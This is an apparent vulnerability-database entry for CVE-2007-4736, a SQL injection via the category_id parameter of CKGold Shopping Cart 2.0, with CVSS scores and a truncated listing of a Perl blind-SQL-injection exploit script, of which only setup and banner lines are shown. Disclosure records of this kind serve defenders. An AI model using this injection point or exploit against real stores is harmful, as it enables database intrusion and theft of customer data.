7.5
CVSSv2

CVE-2007-4736

Published: 06/09/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in category.php in CartKeeper CKGold Shopping Cart 2.0 allows remote malicious users to execute arbitrary SQL commands via the category_id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

cartkeeper ckgold shopping cart 2.0

Exploits

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[4]) { print "\n |-------------------------------------------------|"; print "\n | newhack[dot]org |"; print "\n |-------------------------------------------------|"; print "\n | CKGold Shopping Cart v20 Blind SQL Injection |"; print "\n | ...